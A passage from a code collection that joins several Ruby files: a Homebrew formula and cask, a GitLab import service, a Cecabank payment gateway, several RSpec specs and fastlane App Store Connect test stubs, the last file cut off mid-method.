depends_on "meson" => :build
depends_on "ninja" => :build
depends_on "pkg-config" => :build
depends_on "ffmpeg"
depends_on "sdl2"
resource "prebuilt-server" do
url "https://github.com/Genymobile/scrcpy/releases/download/v1.18/scrcpy-server-v1.18"
sha256 "641c5c6beda9399dfae72d116f5ff43b5ed1059d871c9ebc3f47610fd33c51a3"
end
def install
r = resource("prebuilt-server")
r.fetch
cp r.cached_download, buildpath/"prebuilt-server.jar"
mkdir "build" do
system "meson", *std_meson_args,
"-Dprebuilt_server=#{buildpath}/prebuilt-server.jar",
".."
system "ninja", "install"
end
end
def caveats
<<~EOS
At runtime, adb must be accessible from your PATH.
You can install adb from Homebrew Cask:
brew install --cask android-platform-tools
EOS
end
test do
fakeadb = (testpath/"fakeadb.sh")
# When running, scrcpy calls adb three times:
# - adb push ... (to push scrcpy-server.jar)
# - adb reverse ... tcp:PORT ...
# - adb shell ...
# However, exiting on $1 = shell didn't work properly, so instead
# fakeadb exits on $1 = reverse
fakeadb.write <<~EOS
#!/bin/sh
echo $@ >> #{testpath/"fakeadb.log"}
if [ "$1" = "reverse" ]; then
exit 42
fi
EOS
fakeadb.chmod 0755
ENV["ADB"] = fakeadb
# It's expected to fail after adb reverse step because fakeadb exits
# with code 42
out = shell_output("#{bin}/scrcpy -p 1337 2>&1", 1)
assert_match(/ 42/, out)
log_content = File.read(testpath/"fakeadb.log")
# Check that it used port we've specified
assert_match(/tcp:1337/, log_content)
# Check that it tried to push something from its prefix
assert_match(/push #{prefix}/, log_content)
end
end
| 29.576471 | 92 | 0.678202 |
1d33b420cc13744c1307f9216ce1021f4ca80b17 | 513 | cask "qownnotes" do
version "20.10.5"
sha256 "f1e8a22a4b911e053b285980500fe705ddd5accc897d2b6489f169b1849cadfa"
# github.com/pbek/QOwnNotes/ was verified as official when first introduced to the cask
url "https://github.com/pbek/QOwnNotes/releases/download/v#{version}/QOwnNotes.dmg"
appcast "https://www.qownnotes.org/api/v1/last_release/QOwnNotes/macosx.json"
name "QOwnNotes"
homepage "https://www.qownnotes.org/"
auto_updates true
depends_on macos: ">= :sierra"
app "QOwnNotes.app"
end
| 32.0625 | 89 | 0.766082 |
1c5a549feb9cec77ca766d4cf3a92afab83e3f82 | 1,867 | module Projects
class ImportService < BaseService
include Gitlab::ShellAdapter
Error = Class.new(StandardError)
def execute
add_repository_to_project unless project.gitlab_project_import?
import_data
success
rescue => e
error(e.message)
end
private
def add_repository_to_project
if unknown_url?
# In this case, we only want to import issues, not a repository.
create_repository
elsif !project.repository_exists?
import_repository
end
end
def create_repository
unless project.create_repository
raise Error, 'The repository could not be created.'
end
end
def import_repository
begin
gitlab_shell.import_repository(project.repository_storage_path, project.path_with_namespace, project.import_url)
rescue => e
# Expire cache to prevent scenarios such as:
# 1. First import failed, but the repo was imported successfully, so +exists?+ returns true
# 2. Retried import, repo is broken or not imported but +exists?+ still returns true
project.repository.before_import if project.repository_exists?
raise Error, "Error importing repository #{project.import_url} into #{project.path_with_namespace} - #{e.message}"
end
end
def import_data
return unless has_importer?
project.repository.before_import unless project.gitlab_project_import?
unless importer.execute
raise Error, 'The remote data could not be imported.'
end
end
def has_importer?
Gitlab::ImportSources.importer_names.include?(project.import_type)
end
def importer
Gitlab::ImportSources.importer(project.import_type).new(project)
end
def unknown_url?
project.import_url == Project::UNKNOWN_IMPORT_URL
end
end
end
| 26.671429 | 123 | 0.695769 |
39d6d74388d13d4de1449ff05070b728e78bfc84 | 1,496 | # frozen_string_literal: true
require 'spec_helper'
def load_test_cases(filepath)
data = JSON.parse(File.open(filepath).read, symbolize_names: true)
environment = Flagsmith::Engine::Environment.build(data[:environment])
data[:identities_and_responses].map do |test_case|
identity = Flagsmith::Engine::Identity.build(test_case[:identity])
{
environment: environment,
identity: identity,
response: test_case[:response]
}
end
end
RSpec.describe Flagsmith::Engine::Core do
load_test_cases(
File.join(APP_ROOT, 'spec/engine-test-data/data/environment_n9fbf9h3v4fFgH3U3ngWhb.json')
).each do |test_case|
engine = Class.new { extend Flagsmith::Engine::Core }
json_flags = test_case.dig(:response, :flags).sort_by { |json| json.dig(:feature, :name) }
feature_states = engine.get_identity_feature_states(test_case[:environment], test_case[:identity]).sort_by { |fs| fs.feature.name }
it { expect(feature_states.length).to eq(json_flags.length) }
json_flags.each.with_index do |json_flag, index|
describe "feature state with ID #{json_flag.dig(:feature, :id)}" do
subject { feature_states[index] }
context '#enabled?' do
it { expect(subject.enabled?).to eq(json_flag[:enabled]) }
end
context '#get_value' do
it {
expect(subject.get_value(test_case[:identity].django_id)).to eq(json_flag[:feature_state_value])
}
end
end
end
end
end
| 32.521739 | 135 | 0.688503 |
f7ece9b149c029f505bbb86aaeabbc195d345e34 | 262 | module Faker
class Friends < Base
class << self
def character
fetch('friends.characters')
end
def location
fetch('friends.locations')
end
def quote
fetch('friends.quotes')
end
end
end
end
| 14.555556 | 35 | 0.557252 |
3881a9da16c253bda797779f0916e0549f1a9f7c | 2,227 | # frozen_string_literal: true
# encoding: utf-8
require 'spec_helper'
describe Mongo::Auth::Aws::Request do
describe "#formatted_time" do
context "when time is provided and frozen" do
let(:original_time) { Time.at(1592399523).freeze }
let(:request) do
described_class.new(access_key_id: 'access_key_id',
secret_access_key: 'secret_access_key',
session_token: 'session_token',
host: 'host',
server_nonce: 'server_nonce',
time: original_time
)
end
it 'doesn\'t modify the time instance variable' do
expect { request.formatted_time }.to_not raise_error
end
it 'returns the correct formatted time' do
expect(request.formatted_time).to eq('20200617T131203Z')
end
end
context "when time is not provided" do
let(:request) do
described_class.new(access_key_id: 'access_key_id',
secret_access_key: 'secret_access_key',
session_token: 'session_token',
host: 'host',
server_nonce: 'server_nonce'
)
end
it 'doesn\'t raise an error on formatted_time' do
expect { request.formatted_time }.to_not raise_error
end
end
end
describe "#signature" do
context "when time is provided and frozen" do
let(:original_time) { Time.at(1592399523).freeze }
let(:request) do
described_class.new(access_key_id: 'access_key_id',
secret_access_key: 'secret_access_key',
session_token: 'session_token',
host: 'host',
server_nonce: 'server_nonce',
time: original_time
)
end
it 'doesn\'t raise error on signature' do
expect { request.signature }.to_not raise_error
end
end
context "when time is not provided" do
let(:request) do
described_class.new(access_key_id: 'access_key_id',
secret_access_key: 'secret_access_key',
session_token: 'session_token',
host: 'host',
server_nonce: 'server_nonce'
)
end
it 'doesn\'t raise error on signature' do
expect { request.signature }.to_not raise_error
end
end
end
end
| 27.8375 | 64 | 0.626403 |
ed54d0987aa4d4dc10d24ea61cc70fab1a1d3f3f | 9,226 | module ActiveMerchant #:nodoc:
module Billing #:nodoc:
class CecabankGateway < Gateway
self.test_url = 'https://tpv.ceca.es'
self.live_url = 'https://pgw.ceca.es'
self.supported_countries = ['ES']
self.supported_cardtypes = [:visa, :master, :american_express]
self.homepage_url = 'http://www.ceca.es/es/'
self.display_name = 'Cecabank'
self.default_currency = 'EUR'
self.money_format = :cents
#### CECA's MAGIC NUMBERS
CECA_NOTIFICATIONS_URL = 'NONE'
CECA_ENCRIPTION = 'SHA2'
CECA_DECIMALS = '2'
CECA_MODE = 'SSL'
CECA_UI_LESS_LANGUAGE = 'XML'
CECA_UI_LESS_LANGUAGE_REFUND = '1'
CECA_UI_LESS_REFUND_PAGE = 'anulacion_xml'
CECA_ACTION_REFUND = 'anulaciones/anularParcial' # use partial refund's URL to avoid time frame limitations and decision logic on client side
CECA_ACTION_PURCHASE = 'tpv/compra'
CECA_CURRENCIES_DICTIONARY = {'EUR' => 978, 'USD' => 840, 'GBP' => 826}
# Creates a new CecabankGateway
#
# The gateway requires four values for connection to be passed
# in the +options+ hash.
#
# ==== Options
#
# * <tt>:merchant_id</tt> -- Cecabank's merchant_id (REQUIRED)
# * <tt>:acquirer_bin</tt> -- Cecabank's acquirer_bin (REQUIRED)
# * <tt>:terminal_id</tt> -- Cecabank's terminal_id (REQUIRED)
# * <tt>:key</tt> -- Cecabank's cypher key (REQUIRED)
# * <tt>:test</tt> -- +true+ or +false+. If true, perform transactions against the test server.
# Otherwise, perform transactions against the production server.
def initialize(options = {})
requires!(options, :merchant_id, :acquirer_bin, :terminal_id, :key)
super
end
# Perform a purchase, which is essentially an authorization and capture in a single operation.
#
# ==== Parameters
#
# * <tt>money</tt> -- The amount to be purchased as an Integer value in cents.
# * <tt>creditcard</tt> -- The CreditCard details for the transaction.
# * <tt>options</tt> -- A hash of optional parameters.
#
# ==== Options
#
# * <tt>:order_id</tt> -- order_id passed used purchase. (REQUIRED)
# * <tt>:currency</tt> -- currency. Supported: EUR, USD, GBP.
# * <tt>:description</tt> -- description to be pased to the gateway.
def purchase(money, creditcard, options = {})
requires!(options, :order_id)
post = {'Descripcion' => options[:description],
'Num_operacion' => options[:order_id],
'Idioma' => CECA_UI_LESS_LANGUAGE,
'Pago_soportado' => CECA_MODE,
'URL_OK' => CECA_NOTIFICATIONS_URL,
'URL_NOK' => CECA_NOTIFICATIONS_URL,
'Importe' => amount(money),
'TipoMoneda' => CECA_CURRENCIES_DICTIONARY[options[:currency] || currency(money)]}
add_creditcard(post, creditcard)
commit(CECA_ACTION_PURCHASE, post)
end
# Refund a transaction.
#
# This transaction indicates to the gateway that
# money should flow from the merchant to the customer.
#
# ==== Parameters
#
# * <tt>money</tt> -- The amount to be credited to the customer as an Integer value in cents.
# * <tt>identification</tt> -- The reference given from the gateway on purchase (reference, not operation).
# * <tt>options</tt> -- A hash of parameters.
def refund(money, identification, options = {})
reference, order_id = split_authorization(identification)
post = {'Referencia' => reference,
'Num_operacion' => order_id,
'Idioma' => CECA_UI_LESS_LANGUAGE_REFUND,
'Pagina' => CECA_UI_LESS_REFUND_PAGE,
'Importe' => amount(money),
'TipoMoneda' => CECA_CURRENCIES_DICTIONARY[options[:currency] || currency(money)]}
commit(CECA_ACTION_REFUND, post)
end
def supports_scrubbing
true
end
def scrub(transcript)
transcript.
gsub(%r((Authorization: Basic )\w+), '\1[FILTERED]').
gsub(%r((&?pan=)[^&]*)i, '\1[FILTERED]').
gsub(%r((&?cvv2=)[^&]*)i, '\1[FILTERED]')
end
private
def add_creditcard(post, creditcard)
post['PAN'] = creditcard.number
post['Caducidad'] = expdate(creditcard)
post['CVV2'] = creditcard.verification_value
post['Pago_elegido'] = CECA_MODE
end
def expdate(creditcard)
"#{format(creditcard.year, :four_digits)}#{format(creditcard.month, :two_digits)}"
end
def parse(body)
response = {}
root = REXML::Document.new(body).root
response[:success] = (root.attributes['valor'] == 'OK')
response[:date] = root.attributes['fecha']
response[:operation_number] = root.attributes['numeroOperacion']
response[:message] = root.attributes['valor']
if root.elements['OPERACION']
response[:operation_type] = root.elements['OPERACION'].attributes['tipo']
response[:amount] = root.elements['OPERACION/importe'].text.strip
end
response[:description] = root.elements['OPERACION/descripcion'].text if root.elements['OPERACION/descripcion']
response[:authorization_number] = root.elements['OPERACION/numeroAutorizacion'].text if root.elements['OPERACION/numeroAutorizacion']
response[:reference] = root.elements['OPERACION/referencia'].text if root.elements['OPERACION/referencia']
response[:pan] = root.elements['OPERACION/pan'].text if root.elements['OPERACION/pan']
if root.elements['ERROR']
response[:error_code] = root.elements['ERROR/codigo'].text
response[:error_message] = root.elements['ERROR/descripcion'].text
else
if root.elements['OPERACION'].attributes['numeroOperacion'] == '000'
response[:authorization] = root.elements['OPERACION/numeroAutorizacion'].text if root.elements['OPERACION/numeroAutorizacion']
else
response[:authorization] = root.attributes['numeroOperacion']
end
end
return response
rescue REXML::ParseException => e
response[:success] = false
response[:message] = 'Unable to parse the response.'
response[:error_message] = e.message
response
end
def commit(action, parameters)
parameters.merge!(
'Cifrado' => CECA_ENCRIPTION,
'Firma' => generate_signature(action, parameters),
'Exponente' => CECA_DECIMALS,
'MerchantID' => options[:merchant_id],
'AcquirerBIN' => options[:acquirer_bin],
'TerminalID' => options[:terminal_id]
)
url = (test? ? self.test_url : self.live_url) + "/tpvweb/#{action}.action"
xml = ssl_post("#{url}?", post_data(parameters))
response = parse(xml)
Response.new(
response[:success],
message_from(response),
response,
:test => test?,
:authorization => build_authorization(response),
:error_code => response[:error_code]
)
end
def message_from(response)
if response[:message] == 'ERROR' && response[:error_message]
response[:error_message]
elsif response[:error_message]
"#{response[:message]} #{response[:error_message]}"
else
response[:message]
end
end
def post_data(params)
return nil unless params
params.map do |key, value|
next if value.blank?
if value.is_a?(Hash)
h = {}
value.each do |k, v|
h["#{key}.#{k}"] = v unless v.blank?
end
post_data(h)
else
"#{key}=#{CGI.escape(value.to_s)}"
end
end.compact.join('&')
end
def build_authorization(response)
[response[:reference], response[:authorization]].join('|')
end
def split_authorization(authorization)
authorization.split('|')
end
def generate_signature(action, parameters)
signature_fields =
case action
when CECA_ACTION_REFUND
options[:key].to_s +
options[:merchant_id].to_s +
options[:acquirer_bin].to_s +
options[:terminal_id].to_s +
parameters['Num_operacion'].to_s +
parameters['Importe'].to_s +
parameters['TipoMoneda'].to_s +
CECA_DECIMALS +
parameters['Referencia'].to_s +
CECA_ENCRIPTION
else
options[:key].to_s +
options[:merchant_id].to_s +
options[:acquirer_bin].to_s +
options[:terminal_id].to_s +
parameters['Num_operacion'].to_s +
parameters['Importe'].to_s +
parameters['TipoMoneda'].to_s +
CECA_DECIMALS +
CECA_ENCRIPTION +
CECA_NOTIFICATIONS_URL +
CECA_NOTIFICATIONS_URL
end
Digest::SHA2.hexdigest(signature_fields)
end
end
end
end
| 37.052209 | 149 | 0.593323 |
91581fb9e33c10fe7e74002927a77681be7a7c61 | 45,200 | # rubocop:disable Metrics/ClassLength
class TunesStubbing
class << self
def itc_read_fixture_file(filename)
File.read(File.join('spaceship', 'spec', 'tunes', 'fixtures', filename))
end
# Necessary, as we're now running this in a different context
def stub_request(*args)
WebMock::API.stub_request(*args)
end
def itc_stub_login
# Retrieving the current login URL
itc_service_key_path = File.expand_path("~/Library/Caches/spaceship_itc_service_key.txt")
File.delete(itc_service_key_path) if File.exist?(itc_service_key_path)
stub_request(:get, 'https://appstoreconnect.apple.com/itc/static-resources/controllers/login_cntrl.js').
to_return(status: 200, body: itc_read_fixture_file('login_cntrl.js'))
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa").
to_return(status: 200, body: "")
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/wa").
to_return(status: 200, body: "")
stub_request(:get, "https://appstoreconnect.apple.com/olympus/v1/session").
to_return(status: 200, body: itc_read_fixture_file('olympus_session.json'))
stub_request(:get, "https://appstoreconnect.apple.com/olympus/v1/app/config?hostname=itunesconnect.apple.com").
to_return(status: 200, body: { authServiceKey: 'e0abc' }.to_json, headers: { 'Content-Type' => 'application/json' })
# Actual login
stub_request(:post, "https://idmsa.apple.com/appleauth/auth/signin").
with(body: { "accountName" => "[email protected]", "password" => "so_secret", "rememberMe" => true }.to_json).
to_return(status: 200, body: '{}', headers: { 'Set-Cookie' => "myacinfo=abcdef;" })
# Failed login attempts
stub_request(:post, "https://idmsa.apple.com/appleauth/auth/signin").
with(body: { "accountName" => "bad-username", "password" => "bad-password", "rememberMe" => true }.to_json).
to_return(status: 401, body: '{}', headers: { 'Set-Cookie' => 'session=invalid' })
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/v1/session/webSession").
with(body: "{\"contentProviderId\":\"5678\",\"dsId\":null}",
headers: { 'Accept' => '*/*', 'Accept-Encoding' => 'gzip;q=1.0,deflate;q=0.6,identity;q=0.3', 'Content-Type' => 'application/json' }).
to_return(status: 200, body: "", headers: {})
# 2FA: Request security code to trusted phone
[1, 2].each do |id|
stub_request(:put, "https://idmsa.apple.com/appleauth/auth/verify/phone").
with(body: "{\"phoneNumber\":{\"id\":#{id}},\"mode\":\"sms\"}").
to_return(status: 200, body: "", headers: {})
end
# 2FA: Submit security code from trusted phone for verification
[1, 2].each do |id|
stub_request(:post, "https://idmsa.apple.com/appleauth/auth/verify/phone/securitycode").
with(body: "{\"securityCode\":{\"code\":\"123\"},\"phoneNumber\":{\"id\":#{id}},\"mode\":\"sms\"}").
to_return(status: 200, body: "", headers: {})
end
# 2FA: Submit security code from trusted phone with voice for verification
stub_request(:post, "https://idmsa.apple.com/appleauth/auth/verify/phone/securitycode").
with(body: "{\"securityCode\":{\"code\":\"123\"},\"phoneNumber\":{\"id\":1},\"mode\":\"voice\"}").
to_return(status: 200, body: "", headers: {})
# 2FA: Submit security code from trusted device for verification
stub_request(:post, "https://idmsa.apple.com/appleauth/auth/verify/trusteddevice/securitycode").
with(body: "{\"securityCode\":{\"code\":\"123\"}}").
to_return(status: 200, body: "", headers: {})
# 2FA: Trust computer
stub_request(:get, "https://idmsa.apple.com/appleauth/auth/2sv/trust").
to_return(status: 200, body: "", headers: {})
end
def itc_stub_applications
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/manageyourapps/summary/v2").
to_return(status: 200, body: itc_read_fixture_file('app_summary.json'), headers: { 'Content-Type' => 'application/json' })
# Create Version stubbing
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/version/create/1013943394").
with(body: "{\"version\":\"0.1\"}").
to_return(status: 200, body: itc_read_fixture_file('create_version_success.json'), headers: { 'Content-Type' => 'application/json' })
# Create Application
# Pre-Fill request
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/create/v2/?platformString=ios").
to_return(status: 200, body: itc_read_fixture_file('create_application_prefill_request.json'), headers: { 'Content-Type' => 'application/json' })
# Actual success request
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/create/v2").
to_return(status: 200, body: itc_read_fixture_file('create_application_success.json'), headers: { 'Content-Type' => 'application/json' })
# Overview of application to get the versions
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/1013943394/overview").
to_return(status: 200, body: itc_read_fixture_file('app_overview.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/overview").
to_return(status: 200, body: itc_read_fixture_file('app_overview.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/1000000000/overview").
to_return(status: 200, body: itc_read_fixture_file('app_overview_stuckinprepare.json'), headers: { 'Content-Type' => 'application/json' })
# App Details
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/details").
to_return(status: 200, body: itc_read_fixture_file('app_details.json'), headers: { 'Content-Type' => 'application/json' })
# Versions History
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/stateHistory?platform=ios").
to_return(status: 200, body: itc_read_fixture_file('app_versions_history.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/versions/814624685/stateHistory?platform=ios").
to_return(status: 200, body: itc_read_fixture_file('app_version_states_history.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_ratings
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/reviews/summary").
to_return(status: 200, body: itc_read_fixture_file('ratings.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/reviews/summary?storefront=US").
to_return(status: 200, body: itc_read_fixture_file('ratings_US.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/reviews?index=0&sort=REVIEW_SORT_ORDER_MOST_RECENT&storefront=US").
to_return(status: 200, body: itc_read_fixture_file('review_by_storefront.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/reviews?index=0&sort=REVIEW_SORT_ORDER_MOST_RECENT&versionId=1").
to_return(status: 200, body: itc_read_fixture_file('review_by_version_id.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_build_details
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/buildHistory?platform=ios").
to_return(status: 200, body: itc_read_fixture_file('build_history.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/trains/2.0.1/buildHistory?platform=ios").
to_return(status: 200, body: itc_read_fixture_file('build_history_for_train.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/trains/2.0.1/builds/4/details").
to_return(status: 200, body: itc_read_fixture_file('build_details.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_candidate_builds
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/versions/812106519/candidateBuilds").
to_return(status: 200, body: itc_read_fixture_file('candiate_builds.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_applications_first_create
# Create First Application
# Pre-Fill request
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/create/v2/?platformString=ios").
to_return(status: 200, body: itc_read_fixture_file('create_application_prefill_first_request.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_applications_broken_first_create
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/create/v2").
to_return(status: 200, body: itc_read_fixture_file('create_application_first_broken.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_broken_create
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/create/v2").
to_return(status: 200, body: itc_read_fixture_file('create_application_broken.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_broken_create_wildcard
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/create/v2").
to_return(status: 200, body: itc_read_fixture_file('create_application_wildcard_broken.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_versions
# Receiving app version
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/versions/813314674").
to_return(status: 200, body: itc_read_fixture_file('app_version.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/versions/113314675").
to_return(status: 200, body: itc_read_fixture_file('app_version.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/1000000000/platforms/ios/versions/800000000").
to_return(status: 200, body: itc_read_fixture_file('app_version.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_attachment
# Receiving app version
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/versions/813314674").
to_return(status: 200, body: itc_read_fixture_file('app_review_attachment.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_submissions
# Start app submission
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/versions/812106519/submit/summary").
to_return(status: 200, body: itc_read_fixture_file('app_submission/start_success.json'), headers: { 'Content-Type' => 'application/json' })
# Complete app submission
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/versions/812106519/submit/complete").
to_return(status: 200, body: itc_read_fixture_file('app_submission/complete_success.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_submissions_already_submitted
# Start app submission
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/versions/812106519/submit/summary").
to_return(status: 200, body: itc_read_fixture_file('app_submission/start_success.json'), headers: { 'Content-Type' => 'application/json' })
# Complete app submission
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/versions/812106519/submit/complete").
to_return(status: 200, body: itc_read_fixture_file('app_submission/complete_failed.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_submissions_invalid
# Start app submission
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/versions/812106519/submit/summary").
to_return(status: 200, body: itc_read_fixture_file('app_submission/start_failed.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_resolution_center
# Called from the specs to simulate invalid server responses
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/resolutionCenter?v=latest").
to_return(status: 200, body: itc_read_fixture_file('app_resolution_center.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/resolutionCenter?v=latest").
to_return(status: 200, body: itc_read_fixture_file('app_resolution_center.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_build_trains
%w(internal external).each do |type|
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/trains/?platform=ios&testingType=#{type}").
to_return(status: 200, body: itc_read_fixture_file('build_trains.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/trains/?platform=appletvos&testingType=#{type}").
to_return(status: 200, body: itc_read_fixture_file('build_trains.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/trains/?testingType=#{type}").
to_return(status: 200, body: itc_read_fixture_file('build_trains.json'), headers: { 'Content-Type' => 'application/json' })
# Update build trains
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/testingTypes/#{type}/trains/").
to_return(status: 200, body: itc_read_fixture_file('build_trains.json'), headers: { 'Content-Type' => 'application/json' })
end
end
def itc_stub_testers
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/pre/int").
to_return(status: 200, body: itc_read_fixture_file('testers/get_internal.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/pre/ext").
to_return(status: 200, body: itc_read_fixture_file('testers/get_external.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/user/internalTesters/898536088/").
to_return(status: 200, body: itc_read_fixture_file('testers/existing_internal_testers.json'), headers: { 'Content-Type' => 'application/json' })
# Creating new testers is stubbed in `testers_spec.rb`
end
def itc_stub_testflight
%w(appletvos ios).each do |type|
# Test information
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/#{type}/trains/1.0/builds/10/testInformation").
to_return(status: 200, body: itc_read_fixture_file("testflight_build_info_#{type}.json"), headers: { 'Content-Type' => 'application/json' })
# Reject review
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/#{type}/trains/1.0/builds/10/reject").
with(body: "{}").
to_return(status: 200, body: "{}", headers: { 'Content-Type' => 'application/json' })
# Submission
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/#{type}/trains/1.0/builds/10/review/submit").
to_return(status: 200, body: itc_read_fixture_file("testflight_submission_submit_#{type}.json"), headers: { 'Content-Type' => 'application/json' })
end
end
def itc_stub_resolution_center_valid
# Called from the specs to simulate valid server responses
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/resolutionCenter?v=latest").
to_return(status: 200, body: itc_read_fixture_file('app_resolution_center_valid.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/resolutionCenter?v=latest").
to_return(status: 200, body: itc_read_fixture_file('app_resolution_center_valid.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_invalid_update
# Called from the specs to simulate invalid server responses
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/versions/812106519").
to_return(status: 200, body: itc_read_fixture_file('update_app_version_failed.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_valid_update
# Called from the specs to simulate valid server responses
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/versions/812106519").
to_return(status: 200, body: itc_read_fixture_file("update_app_version_success.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_valid_version_update_with_autorelease_and_release_on_datetime
# Called from the specs to simulate valid server responses
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/versions/812106519").
to_return(status: 200, body: itc_read_fixture_file("update_app_version_with_autorelease_overwrite_success.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_app_version_ref
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/version/ref").
to_return(status: 200, body: itc_read_fixture_file("app_version_ref.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_user_detail
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/user/detail").
